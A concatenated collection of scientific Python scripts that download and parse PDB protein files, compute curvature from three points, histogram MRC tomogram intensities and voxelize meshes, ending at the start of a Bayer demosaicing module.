def DownloadFile(url, verbose_mode = True):
DownloadFileTo(url, ExtractFileName(url), verbose_mode)
# Read in the list of PDB files already downloaded:
pdbs_old = set([])
try:
pdbs_old_file = open('pdbs_old.txt', 'r')
for pdb_code in pdbs_old_file:
pdb_code = pdb_code.strip()#eliminate trailing and preceeding whitespace
pdb_code = pdb_code.lower()#pdb codes are case-insensitive
if (len(pdb_code) != 4):
sys.stderr.write('Error in in \"pdbs_old.txt\":\n')
sys.stderr.write(' Invalid PDB-code: \"'+pdb_code+'\"\n')
exit(-1)
pdbs_old.add(pdb_code)
pdbs_old_file.close()
except IOError:
pass
def main():
# Here we keep track of the list of pdb files which
# i) are in the current list of pdb files requested in
# sys.stdin
# ii) are in the current list, but are not downloaded yet
# (new pdb files)
pdbs_current_file = open('pdbs_most_recent.txt', 'w')
pdbs_current = set([]) #entire list of pdb codes requested
pdbs_new = set([]) #a list of new pdb codes requested that were not in the old list
pdbs_old_file = open('pdbs_old.txt', 'a')
for line in sys.stdin:
line = line.strip()
if len(line) == 0:
continue
pdb_code = line.lower() #(pdb codes are case-insensitive)
if (pdb_code in pdbs_new):
sys.stderr.write(pdb_code+' appears redundantly. skipping\n')
elif (pdb_code in pdbs_old):
if (not (pdb_code in pdbs_current)):
sys.stderr.write(pdb_code+' downloaded already. skipping.\n')
pdbs_current.add(pdb_code)
pdbs_current_file.write(pdb_code+'\n')
pdbs_current_file.flush() #<- necessary in case we get interrupted
else:
sys.stderr.write(pdb_code+' appears redundantly. skipping\n')
else:
#Download the corresponding pdb file
file_name = pdb_code+'.pdb.gz' # <- these are compressed files
url = 'http://www.rcsb.org/pdb/files/'+file_name
# Note, if the URL above files, try this one instead:
# url = 'https://files.rcsb.org/download/'+file_name
DownloadFileTo(url, file_name)
#Unzip the pdb file:
with gzip.open(file_name, 'rb') as f:
file_content = f.read()
f.close()
f = open(pdb_code+'.pdb', 'wb')
f.write(file_content)
if not FileExists(pdb_code+'.pdb'):
sys.stderr.write('Error: A problem occured when trying to download PDB code \"'+pdb_code+'\"\n'
' Delete this entry from the file \"pdbs_old.txt\", and rerun '+g_program_name+'\n')
sys.exit(-1)
#Optional: Download the corresponding DSSP file
url = 'ftp://ftp.cmbi.ru.nl/pub/molbio/data/dssp/'+pdb_code+'.dssp'
DownloadFile(url)
if not FileExists(pdb_code+'.dssp'):
sys.stderr.write(" (The old DSSP PDB is server flaking out again.\n"
" Don't worry. DSSP files are not needed.)\n")
#Keep track of the the pdbs we have downloaded so far:
pdbs_current.add(pdb_code)
pdbs_current_file.write(pdb_code+'\n')
pdbs_current_file.flush() #<- necessary in case we get interrupted
pdbs_old_file.write(pdb_code+'\n')
pdbs_old_file.flush() #<- necessary in case we get interrupted
pdbs_new.add(pdb_code)
pdbs_current_file.close()
def ChainFromPDBfile(chainID, pdb_file):
for line in pdb_file:
line_type = line[0:6]
if line_type in set(['ATOM ', 'HETATM', 'ANISOU', 'SIGATM', 'SIGUIJ']):
if line[21:22] == chainID:
yield line
elif line_type == "HET ":
if line[12:13] == chainID:
yield line
elif line_type == "HELIX ":
initChainID = line[19:20]
endChainID = line[31:32]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "SHEET ":
initChainID = line[21:22]
endChainID = line[32:33]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "TURN ":
initChainID = line[19:20]
endChainID = line[30:31]
if (initChainID == chainID) or (endChainID == chainID):
yield line
elif line_type == "SEQRES":
if line[11:12] == chainID:
yield line
elif line_type == "TER ":
ter_chainID = line[21:22]
if (ter_chainID == chainID) or (ter_chainID == " "):
yield line
else:
yield line
return
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/has_helices.py
```python
import sys
def main():
helix_found = False;
for line in sys.stdin:
if (line[0:6] == "HELIX "):
helix_found = True;
if (helix_found):
exit(0) # normal termination indicates a helix was found
else:
exit(1) # non-zero (abnormal termination) exit code indicates
# this PDB file does not contain a helix.
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/has_protein_heavy_atoms.py
```python
import sys
res_types = (['ALA',
'ARG',
'ASN',
'ASP',
'CYS',
'GLU',
'GLN',
'GLY',
'HIS',
'ILE',
'LEU',
'LYS',
'MET',
'PHE',
'PRO',
'SER',
'THR',
'TRP',
'TYR',
'VAL'])
atoms_found = {' CA ':False,
' CB ':False,
' C ':False,
' N ':False,
' O ':False}
def main():
for line in sys.stdin:
if (line[0:5] == 'ATOM '):
atom_type=line[12:16]
res_type=line[17:20]
#print('atom_type=\"'+atom_type+'\", res_type=\"'+res_type+'\"')
if (res_type in res_types):
atoms_found[atom_type] = True
search_criteria_satisfied = True
for atom_type in atoms_found:
if (not atoms_found[atom_type]):
search_criteria_satisfied = False
if (search_criteria_satisfied):
exit(0) # normal termination indicates all atoms were found
else:
exit(1) # non-zero (abnormal termination) exit code indicates this PDB
# file does not contain very many heavy atoms in amino acids
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2coords_ave.py
```python
import sys
from operator import attrgetter
try:
from .resid import *
except ImportError:
from resid import *
# --- THE FOLLOWING FEATURES (interval restrictions) may be removed later:--
#
# The entire PDB file does not have to be used. Instead, the user can pass
# 6 arguments denoting the first and last residue of an interval in the chain.
# In order to specify any amino acid in a PDB file, you must provide 3
# identifiers:
# the ChainID a single letter specifying
# the SeqNum an integer indicating the location within that chain
# the ICode (an insert code, usually " ")
#
# All 3 identifiers are needed for both the starting and ending residues.
# Consequently this program expects 6 arguments:
# (to be read from the command line)
# ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last
# The following atoms are not included in the average:
ignore_these_atoms = [' N ', ' H ', ' C ', ' O ', ' CA ']
# The following residues are completely excluded:
ignore_these_residues = set(['GLY', 'PRO'])
def main():
use_all_residues = True
if len(sys.argv) > 1:
i = 1
while i < len(sys.argv):
if (len(sys.argv[i]) == 3):
# Add the string to the list of amino acids we want to ignore
resType = sys.argv[i]
ignore_these_residues.add(resType)
i += 1
else: # if not is_digit(sys.argv[i][0])
# If the next argument is a number, then interpret this number
# as a residue sequence number
if len(sys.argv) < i+6:
sys.stderr.write("Error: Not enough arguments or argument type error:\n"
" Offending arguemt #"+str(i)+": \""+sys.argv[i]+"\"\n")
if len(sys.argv[i]) == 1:
sys.stderr.write("\n"
" Is argument \""+sys.argv[i]+"\" a chain ID letter?\n"
" (Chain IDs are only passed as arguments when you want to limit the\n"
" residues considered to within an interval in the PDB file.\n"
" To specify an interval, you must provide 5 more aruments. See below.)\n"
"\n"
" Note: one-letter residue codes (eg A,V,L,...) are not considered\n"
" valid residue types by this program.\n"
" You must specify a 3-letter equivalent (eg ALA, VAL, LYS,...).\n"
" One-letter arguments are interpreted as chain-IDs. (See below.)\n"
" \n"
" By default, the the sequence is extracted from the entire PDB file.\n"
" In that case, no arguments are required.\n"
" Alternately, you can limit the selection to a single interval of\n"
" residues from one of the chains in the PDB file.\n"
" To specify an interval, you must passing 6 arguments to this program.\n"
" This program requires a pair of residues to designate the first and\n"
" last members of the interval. Each residue requires 3 identifiers.\n"
" Consequently the six arguments needed are:\n"
"\n"
"ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last\n"
"\n")
else:
sys.stderr.write("\n"
"Note: PDB files are not passed as arguments\n"
" but are read from the standard input, for example using the notation\n"
"\n"
" "+sys.argv[0]+" < file.pdb\n")
exit(-1)
else:
use_all_residues = False
first = ResID(sys.argv[i], int(sys.argv[i+1]), sys.argv[i+2])
last = ResID(sys.argv[i+3], int(sys.argv[i+4]), sys.argv[i+5])
#sys.stderr.write(' Interval selected: (\"'+first.chainID+'\", '+str(first.seqNum)+', \"'+first.iCode+'\") ... (\"'+last.chainID+'\", '+str(last.seqNum)+', \"'+last.iCode+'\")\n')
i += 6
resID2pos = {}
for line in sys.stdin:
if (line[0:6] == "ATOM "):
#atomID = int(line[6:11])
atomType = line[12:16]
#altLoc = line[16:17]
resType = line[17:20]
chainID = line[21:22]
resSeq = line[22:26]
iCode = line[26:27]
resID = ResID(chainID, int(resSeq), iCode)
#xyz_str = line[30:54]<-not safe. spaces not always in between numbers
x_str = line[30:38].strip()
y_str = line[38:46].strip()
z_str = line[46:54].strip()
x = float(x_str)
y = float(y_str)
z = float(z_str)
if (use_all_residues or ((first<=resID) and (resID<=last))):
if resID not in resID2pos:
resID2pos[resID] = []
# Ignore atoms on the backbone (other than CA), and also
# ignore all atoms which are not heavy atoms (hydrogen atoms).
if ((resType not in ignore_these_residues) and
(atomType not in ignore_these_atoms)):
resID2pos[resID].append([x, y, z, atomType])
# Extract an (unordered) list of the resIDs of the residues in the sequence
resIDs = [resID for resID in resID2pos]
# Residues in PDB files are often not listed in order.
# Consequently, we must sort the list by chainID, seqNum, and finnaly iCode:
sequence_of_resIDs = sorted(resIDs, key=attrgetter('chainID','seqNum','iCode'))
# Now loop through the sequence of resIDs, and calculate
# the average position of the atoms in that residue.
for resID in sequence_of_resIDs:
coords = resID2pos[resID]
if coords == []:
sys.stdout.write('\n')
else:
xyz_tot = [0.0 for d in range(0,3)]
num_atoms_in_res = len(coords)
for i in range(0, num_atoms_in_res):
for d in range(0,3):
xyz_tot[d] += coords[i][d]
x_ave = xyz_tot[0] / num_atoms_in_res
y_ave = xyz_tot[1] / num_atoms_in_res
z_ave = xyz_tot[2] / num_atoms_in_res
x_str = str(x_ave)
y_str = str(y_ave)
z_str = str(z_ave)
# Alternately, I could have used:
# x_str = "%5.3" % x_ave
# y_str = "%5.3" % y_ave
# z_str = "%5.3" % z_ave
sys.stdout.write(x_str+' '+y_str+' '+z_str+'\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2sheet.py
```python
import sys
def main():
for line in sys.stdin:
if (line[0:6] == "SHEET "):
initChainID = line[21:22]
initSeqNum = int(line[22:26])
initICode = line[26:27]
endChainID = line[32:33]
endSeqNum = int(line[33:37])
endICode = line[37:38]
sys.stdout.write("\""+initChainID+"\" "+str(initSeqNum)+" \""+initICode+
"\" \""+
endChainID+"\" "+str(endSeqNum)+" \""+endICode+"\"\n")
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/pdb2turn.py
```python
import sys
def main():
for line in sys.stdin:
if (line[0:6] == "TURN "):
initChainID = line[19:20]
initSeqNum = int(line[20:24])
initICode = line[24:25]
endChainID = line[30:31]
endSeqNum = int(line[31:35])
endICode = line[35:36]
sys.stdout.write("\""+initChainID+"\" "+str(initSeqNum)+" \""+initICode+
"\" \""+
endChainID+"\" "+str(endSeqNum)+" \""+endICode+"\"\n")
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/select_interval.py
```python
import sys
# Sometimes this program pipes its output to other programs which stops reading
# the PDB file prematurely (such as when multiple MODEL records are present).
# Below we silently suppress the ugly "Broken pipe" message this generates:
import signal
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
try:
from .resid import *
except ImportError:
from resid import *
def main():
if len(sys.argv) != 7:
sys.stderr.write("Error: This program requires 6 arguments.\n"
" This program requires a pair of residues to designate the first and\n"
" last members of the interval. Each residue requires 3 identifiers.\n"
" Consequently the six arguments needed are:\n"
"ChainID_first SeqNum_first ICode_first ChainID_last SeqNum_last ICode_last\n")
exit(-1)
print('\"'+sys.argv[1] + '\" \"' + sys.argv[2] + '\" \"'+ sys.argv[3]+'\"')
first = ResID(sys.argv[1], int(sys.argv[2]), sys.argv[3])
last = ResID(sys.argv[4], int(sys.argv[5]), sys.argv[6])
for line in sys.stdin:
line_type = line[0:6]
if line_type in set(["ATOM ", "HETATM", "ANISOU", "SIGATM", "SIGUIJ"]):
#atomID = int(line[6:11])
#atomType = line[12:16]
#altLoc = line[16:17]
#resType = line[17:20]
chainID = line[21:22]
seqNum = line[22:26]
iCode = line[26:27]
resID = ResID(chainID, int(seqNum), iCode)
if (first <= resID <= last):
sys.stdout.write(line)
elif (line_type == "HET "):
#hetID = line[7:10]
chainID = line[12:13]
seqNum = line[13:17]
iCode = line[17:18]
#numHETATMs = int(line[20:25])
#descriptor = line[30:70]
resID = ResID(chainID, int(seqNum), iCode)
if (first <= resID <= last):
sys.stdout.write(line)
elif (line_type == "HELIX "):
initChainID = line[19:20]
initSeqNum = int(line[21:25])
initICode = line[25:26]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[31:32]
endSeqNum = int(line[33:37])
endICode = line[37:38]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif (line_type == "SHEET "):
initChainID = line[21:22]
initSeqNum = int(line[22:26])
initICode = line[26:27]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[32:33]
endSeqNum = int(line[33:37])
endICode = line[37:38]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif (line_type == "TURN "):
initChainID = line[19:20]
initSeqNum = int(line[20:24])
initICode = line[24:25]
initID = ResID(initChainID, int(initSeqNum), initICode)
endChainID = line[30:31]
endSeqNum = int(line[31:35])
endICode = line[35:36]
endID = ResID(endChainID, int(endSeqNum), endICode)
if (first <= initID <= last) and (first <= endID <= last):
sys.stdout.write(line)
elif line_type == "SEQRES":
chainID = line[11:12]
if (first.chainID <= chainID) and (chainID <= last.chainID):
sys.stdout.write(line)
elif line_type == "TER ":
chainID = line[21:22]
seqNum = int(line[22:26])
iCode = line[26:27]
terRes = ResID(chainID, seqNum, iCode)
if (first <= resID <= last):
sys.stdout.write(line)
else:
sys.stdout.write(line)
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/strip_secondary_str.py
```python
import sys
def main():
for line in sys.stdin:
if ((line[0:6] != "HELIX ") and
(line[0:6] != "SHEET ") and
(line[0:5] != "TURN ")):
sys.stdout.write(line)
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/truncate_chars.py
```python
import sys
def main():
if (len(sys.argv) <= 1):
sys.stderr.write('Error: expected the number of truncations as an argument\n')
truncate_a = int(sys.argv[1])
if (len(sys.argv) >= 3):
truncate_b = int(sys.argv[2])
else:
truncate_b = truncate_a
for line in sys.stdin:
line = line.strip()
if (len(line) > (truncate_a + truncate_b)):
truncated_line = line[truncate_a:len(line)-truncate_b]
else:
truncated_line = ''
sys.stdout.write(truncated_line+'\n')
if __name__ == "__main__":
main()
```
#### File: dlpdb/dlpdb/truncate_tokens.py
```python
import sys
def main():
if (len(sys.argv) <= 1):
sys.stderr.write('Error: expected the number of truncations as an argument\n')
truncate_a = int(sys.argv[1])
if (len(sys.argv) >= 3):
truncate_b = int(sys.argv[2])
else:
truncate_b = truncate_a
for line in sys.stdin:
line = line.strip()
tokens = line.split()
if (len(line) > (truncate_a + truncate_b)):
truncated_tokens = tokens[truncate_a:len(tokens)-truncate_b]
else:
truncated_tokens = []
for i in range(0,len(truncated_tokens)):
sys.stdout.write(truncated_tokens[i])
if i+1 < len(truncated_tokens):
sys.stdout.write(' ')
sys.stdout.write('\n')
if __name__ == "__main__":
main()
```
|
{
"source": "jewettaij/sabl_mpl",
"score": 4
}
|
#### File: sabl_mpl/sabl_mpl/curvature3pts.py
```python
from math import *
import sys
import numpy as np
def CircleFrom3Points2D(r1, r2, r3):
"""
3 points pass through a circle. Find the center of that circle
and its radius. 3 eqns (below) with 3 unknowns (x0, y0, r)
(x1 - x0)^2 + (y1 - y0)^2 = r^2
(x2 - x0)^2 + (y2 - y0)^2 = r^2
(x3 - x0)^2 + (y3 - y0)^2 = r^2
Solve for (x0, y0) using A * (x0, y0) = B where:
"""
B = np.array([r2[0]**2 - r1[0]**2 +
r2[1]**2 - r1[1]**2,
r3[0]**2 - r2[0]**2 +
r3[1]**2 - r2[1]**2])
A = np.array([[2.0 * (r2[0] - r1[0]),
2.0 * (r2[1] - r1[1])],
[2.0 * (r3[0] - r2[0]),
2.0 * (r3[1] - r2[1])]])
x0, y0 = np.linalg.solve(A,B)
r = sqrt((r1[0] - x0)**2 + (r1[1] - y0)**2)
return r, x0, y0
def CircleFrom3Points(r1, r2, r3):
"""
This is the N-dimensional generalization of CircleFrom3Points2D().
(It works in 3D and also higher dimensions.
This function is not necessary for "sabl.py" which is a 2D program.
Consequently, I never got around to testing it carefully.
Hopefully this function works, but test it first. -A 2020-6-10)
"""
# Decompose this into a 2D problem using Graham-Schmidt decomposition
# of the original vectors into the basis defined by va=r1-r2 and vb=r3-r2.
# Then apply CircleFrom3Points2D() to find the radius of curvature
# and the central point.
va = r1-r2
vb = r3-r2
ea = va / np.linalg.norm(va)
eb = vb - np.inner(vb,ea)*ea
eb /= np.linalg.norm(eb)
# Now express the vectors r1-r2, r2-r2, and r3-r2
# in the basis formed by unit vectors ea and eb.
# The resutling _r1, _r2, _r3 vectors are 2D vectors.
_r1 = np.array([np.inner(va, ea), np.inner(va, eb)])
_r2 = np.array(r2-r2) # (this should be the zero vector)
_r3 = np.array([np.inner(vb, ea), np.inner(vb, eb)])
# Now invoke "CircleFrom3Points2D()" to calculate the radius and center
# of the circle in this 2D coordinate system
r, x0, y0 = CircleFrom3Points2D(_r1, _r2, _r3)
# Now convert x0, y0 back into the original coordinate system
r0 = r2 + x0*ea + y0*eb
# Now return the results to the caller
return r, r0
def main():
lines = sys.stdin.readlines()
# r1 r2 and r3 are arrays containing the xyz coordinates of the 3 points
r1 = np.array(list(map(float, lines[0].strip().split()))) #x,y,z of point 1
r2 = np.array(list(map(float, lines[1].strip().split()))) #x,y,z of point 2
r3 = np.array(list(map(float, lines[2].strip().split()))) #x,y,z of point 3
radius, center = CircleFrom3Points(r1, r2, r3)
sys.stdout.write('circle_center =')
for i in range(0, center.size):
sys.stdout.write(' '+str(center[i]))
sys.stdout.write('\n')
sys.stdout.write('radius = '+str(radius)+'\n')
if __name__ == '__main__':
main()
```
|
{
"source": "jewettaij/visfd",
"score": 3
}
|
#### File: bin/histogram_mrc/histogram_mrc.py
```python
import sys
from math import *
import numpy as np
import matplotlib.pyplot as plt
import mrcfile #(if module not found, then run "pip install mrcfile")
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
(Raising this exception implies that the caller has provided
a faulty input file or argument.)
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
def main():
try:
rescale01 = False
nbins = -1
mask_name = ''
argv = [arg for arg in sys.argv]
i = 1
while i < len(argv):
#sys.stderr.write('argv['+str(i)+'] = \"'+argv[i]+'\"\n')
if argv[i] == '-n':
if i + 1 >= len(argv):
raise InputError('Error: the \"' + argv[i] + '\" argument should be followed by a positive integer.\n')
nbins = int(argv[i + 1])
del argv[i:i + 2]
elif (argv[i] == '-rescale'):
rescale01 = True
del argv[i:i + 1]
elif (argv[i] == '-mask') or (argv[i] == '-m'):
mask_name = argv[i+1]
del argv[i:i + 2]
else:
i += 1
if len(argv) > 2:
raise InputError('Error: Two many arguments or unrecongized argument:\n'
' '+str(argv[1:])+'\n')
elif len(argv) < 2:
raise InputError('Error: You must supply the name of a file in .MRC (.REC) format.\n')
file_name = argv[1]
try:
hdata = []
sys.stderr.write('Reading MRC file "'+file_name+'"\n')
with mrcfile.open(file_name, 'r') as mrc:
#sys.stdout.write('mrc.data.shape = '+str(mrc.data.shape)+'\n')
hdata = mrc.data.flatten()
if mask_name != '':
sys.stderr.write('Reading MRC file "'+mask_name+'" (mask)\n')
with mrcfile.open(mask_name, 'r') as mask:
if mask.data.shape != mrc.data.shape:
raise InputError('Error: The MRC files ("'+
file_name+'" and "'+mask_name+'")\n'
' must have the same number of voxels in the x,y,z directions.\n'
' (Currently: '+str(mrc.data.shape)+' and '+str(mask.data.shape)+', respectively)\n')
mdata = map(mask.data.flatten())
# Each entry in mdata is assumed to be either 0 or 1
# (or rarely, a number between 0 and 1).
# We can restrict the entries to entries in the original
# hdata array whose corresponding mask value is non-zero
# by multiplying each entry in the two arrays together.
hdata *= mdata
hmin = min(hdata)
hmax = max(hdata)
if hmin == hmax:
raise InputError('Error: The image has only one intensity value: '+str(hmin)+'\n')
if rescale01:
# change to type float
hdata = np.array(hdata, dtype='float32')
hdata -= float(hmin)
hdata *= 1.0/(float(hmax)-float(hmin))
if nbins < 0:
#If unspecified, guess a reasonable number of histogram bins
nbins = 32 # default (for 8 bit integers)
if ((mrc.data.dtype == np.int8) or # 8 bit integers?
(mrc.data.dtype == np.uint8)): # 8 bit integers?
nbins = (1 + int(hmax) - int(hmin))
if rescale01:
hmin = 0.0
hmax = 1.0
sys.stderr.write('nbins = ' + str(nbins) + '\n')
sys.stderr.write('(hmin,hmax) = ('+str(hmin)+','+str(hmax)+')\n')
delta_bin = (float(hmax) - float(hmin)) / float(nbins-1)
sys.stderr.write('delta_bin = ' + str(delta_bin) + '\n')
bins = [hmin + (i-0.5)*delta_bin for i in range(0, nbins+1)]
assert(len(bins) >= 2)
#sys.stderr.write('bins = ' + str(bins) + '\n')
plt.hist(hdata,
bins,
density=True,
facecolor='green',
alpha=0.75)
plt.ylabel('Frequency')
plt.xlabel('Intensity (note: Dark voxels in IMOD have low intensity.)')
plt.grid(True)
plt.show()
except IOError:
raise InputError('Error: Unable to open file \"' + file_name + '\" for reading.\n')
except (InputError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == '__main__':
main()
```
#### File: bin/voxelize_mesh/voxelize_mesh.py
```python
import sys
import argparse
import numpy as np
import pyvista as pv
from vtk.util import numpy_support as vtknp
import mrcfile
g_filename = __file__.split('/')[-1]
g_module_name = g_filename
if g_filename.rfind('.py') != -1:
g_module_name = g_filename[:g_filename.rfind('.py')]
g_date_str = '2021-6-17'
g_version_str = '0.0.2'
g_program_name = g_filename
#sys.stderr.write(g_program_name+' v'+g_version_str+' '+g_date_str+' ')
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
(Raising this exception implies that the caller has provided
a faulty input file or argument.)
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
def voxelize_numpy(mesh,
density=None,
check_surface=True,
bounds=None,
shift=(0.0,0.0,0,0)):
"""Voxelize mesh to create a 3D numpy array of bools (True, False),
indicating whether the corresponding voxel is within the closed surface
formed by the mesh.
Parameters
----------
density : float
The uniform size of the voxels. Defaults to 1/100th of the mesh length.
check_surface : bool
Specify whether to check the surface for closure. If on, then the
algorithm first checks to see if the surface is closed and
manifold. If the surface is not closed and manifold, a runtime
error is raised.
bounds : Size of image in units of physical distance:
(x_min, x_max, y_min, y_max, z_min, z_max)
By default, mesh.bounds is used.
"""
if not pv.is_pyvista_dataset(mesh):
mesh = pv.wrap(mesh)
if density is None:
density = mesh.length / 100
if bounds == None:
bounds = mesh.bounds
x_min, x_max, y_min, y_max, z_min, z_max = bounds
x = np.arange(x_min, x_max, density)
y = np.arange(y_min, y_max, density)
z = np.arange(z_min, z_max, density)
x, y, z = np.meshgrid(x, y, z)
# Create unstructured grid from the structured grid
grid = pv.StructuredGrid(x, y, z)
ugrid = pv.UnstructuredGrid(grid)
# Get part of the mesh within the mesh's bounding surface.
selection = ugrid.select_enclosed_points(mesh.extract_surface(),
tolerance=0.0,
check_surface=check_surface)
mask = selection.point_arrays['SelectedPoints'].view(np.bool_)
# Mask contains an array of True, False values indicating whether
# the corresponding voxel is inside the closed mesh.
# However it is a 1-dimensional VtkArray, not a 3D numpy array.
# It must be converted to a 1D numpy array and converted to 3D with reshape.
# It also must be transposed (x,y,z axes swapped). (I have no idea why.)
data = np.transpose(vtknp.vtk_to_numpy(mask).reshape(grid.dimensions[2],
grid.dimensions[1],
grid.dimensions[0]),
(0,2,1))
return data
def main():
try:
ap = argparse.ArgumentParser()
ap.add_argument('-m', '--mesh', dest='fname_mesh', required=True,
help='file containing closed mesh (eg. a ".ply" file)')
ap.add_argument('-o', '--out', dest='fname_out', required=True,
help='name of the output file that will contain the voxelized mesh (mrc/rec format)')
ap.add_argument('-i', '--in', dest='fname_mrc_orig', required=False,
help='file name of an MRC (or REC) file with the same size as the target. (Typically it is the original image in which the mesh surface was detected.)')
ap.add_argument('-w', '--width', dest='voxel_width', required=False, type=float,
help='-w (or --width) should be followed by the voxel width (default 1)')
ap.add_argument('-c', '--crop', dest='ibounds', required=False, type=float, nargs=6,
help='6 numbers indicating desired boundaries of the resulting cropped image: xmin xmax ymin ymax zmin zmax. (These numbers are in units of voxels. Note: This will override the image size determined from the "-i" or "--in" argument.)')
ap.add_argument('-b', '--bounds', dest='bounds', required=False, type=float, nargs=6,
help='6 numbers indicating desired image size: xmin xmax ymin ymax zmin zmax. (If the voxel width is known, these numbers are in units of distance, not voxels. Note: This will override the image size determined from the "-i" or "--in" argument.)')
ap.add_argument('-s', '--shift', dest='shift', required=False, type=float, nargs=3,
help='3 numbers indicating a shift in the x,y,z coordinates of the mesh before voxelization. (These numbers are in units of voxels, not physical distance.)')
args = ap.parse_args()
# Now process the argument list
# Read the mesh file
try:
mesh = pv.read(args.fname_mesh)
except IOError:
raise InputError('Error: Unable to open file "'+
args.fname_mesh+'" for reading.\n')
# Determine the voxel width
voxel_width_from_file = False
voxel_width = args.voxel_width
if voxel_width == 0.0:
raise InputError('Error: voxel width cannot be non-zero\n')
# Determine the origin of the coordinate system
origin_from_file = False
#origin = args.origin COMMENTING OUT. WE CAN ADD THIS FEATURE LATER.
origin = None
# Determine how big the image is
bounds = args.bounds
# Make sure the user does not accidentally erase their original tomogram
if args.fname_out == args.fname_mrc_orig:
raise InputError('Error: Input and output image files cannot have the same name.\n')
# Did the user specify an input image?
# If so, use it to determine the output image size (and voxel width)
if args.fname_mrc_orig:
try:
with mrcfile.open(args.fname_mrc_orig, 'r') as mrcdata:
mrc_header_cella = mrcdata.header.cella
mrc_header_cellb = mrcdata.header.cellb
mrc_header_origin = mrcdata.header.origin
#mrc_ext_header = mrcdata.extended_header
if origin == None:
origin_from_file = True
if voxel_width == None:
voxel_width_from_file = True
# mrcdata.voxel_size contains the width of the voxel
# (Sometimes it is a numpy array with 3 elements.)
if hasattr(mrcdata.voxel_size, 'x'):
voxel_width = float(mrcdata.voxel_size.x)
# Due to roundoff error,the following is always true
# COMMENTING OUT:
#if ((mrcdata.voxel_size.x != mrcdata.voxel_size.y)
# or
# (mrcdata.voxel_size.y != mrcdata.voxel_size.z)):
# sys.stderr.write('Warning: The voxels in file "'+args.fname_mrc_orig+'"\n'
# ' have a different width in the X,Y,Z directions.\n'
# ' Using the voxel width in the X direction\n')
else:
voxel_width = voxel_size
bounds = (0.0, mrcdata.header.nx*voxel_width,
0.0, mrcdata.header.ny*voxel_width,
0.0, mrcdata.header.nz*voxel_width)
# Should we consider non-zero origin? In the future,
# if the origin is not at 0,0,0, perhaps we should use this:
# I'll worry about this later. -Andrew 2021-6-17
#bounds = (mrcdata.header.origin.x,
# (mrcdata.header.origin.x +
# mrcdata.header.nx*voxel_width),
# mrcdata.header.origin.y,
# (mrcdata.header.origin.y +
# mrcdata.header.ny*voxel_width),
# mrcdata.header.origin.z,
# (mrcdata.header.origin.z +
# mrcdata.header.nz*voxel_width))
mrcdata.close()
except IOError:
raise InputError('Error: Unable to open file "'+
args.fname_mrc_orig+'" for reading.\n')
elif voxel_width == None:
voxel_width = 1
assert(voxel_width != None)
# Alternatively, did the user specify the bounds in units of voxels?
if args.ibounds:
bounds = (args.ibounds[0]*voxel_width,
(args.ibounds[1]+0.99)*voxel_width,
args.ibounds[2]*voxel_width,
(args.ibounds[3]+0.99)*voxel_width,
args.ibounds[4]*voxel_width,
(args.ibounds[5]+0.99)*voxel_width)
# Did the user want us to shift the x,y,z coordinates of the mesh?
if args.shift:
bounds[0] -= args.shift[0]*voxel_width
bounds[1] -= args.shift[0]*voxel_width
bounds[2] -= args.shift[1]*voxel_width
bounds[3] -= args.shift[1]*voxel_width
bounds[4] -= args.shift[2]*voxel_width
bounds[5] -= args.shift[2]*voxel_width
# Now convert the mesh into an image whose (physical) size is "bounds"
voxels = voxelize_numpy(mesh,
density=voxel_width,
check_surface=True,
bounds=bounds)
# Now save the resulting numpy array as an MRC file
mrcdata = mrcfile.new(args.fname_out, overwrite=True)
#mrcdata.voxel_size = voxel_width
if voxel_width_from_file:
mrcdata.header.cella = mrc_header_cella
mrcdata.header.cellb = mrc_header_cellb
#mrcdata.set_extended_header(mrc_ext_header)
else:
mrcdata.header.cella.x = voxel_width * voxels.shape[2]
mrcdata.header.cella.y = voxel_width * voxels.shape[1]
mrcdata.header.cella.z = voxel_width * voxels.shape[0]
if origin_from_file:
mrcdata.header.origin = mrc_header_origin
mrcdata.set_data(voxels)
mrcdata.close()
# Note to self: Here's a way to visualize the results using pyvista:
#voxels["density"] = np.full(voxels.n_cells, 3.65) # 3.65 is arbitrary
#voxels.plot(scalars="density")
# Alternative method:
#voxels.compute_implicit_distance(mesh, inplace=True)
#contours = voxels.contour(20, scalars="implicit_distance")
#p.add_mesh(contours, opacity=0.5, scalars="implicit_distance")
#p.show()
#p = pv.Plotter()
except (InputError, ValueError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == '__main__':
main()
```
|
{
"source": "jewfro-cuban/colour-demosaicing",
"score": 2
}
|
#### File: bayer/demosaicing/menon2007.py
```python
from __future__ import division, unicode_literals
import numpy as np
from scipy.ndimage.filters import convolve, convolve1d
from colour.utilities import as_float_array, tsplit, tstack
from colour_demosaicing.bayer import masks_CFA_Bayer
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2015-2019 - Colour Developers'
__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = [
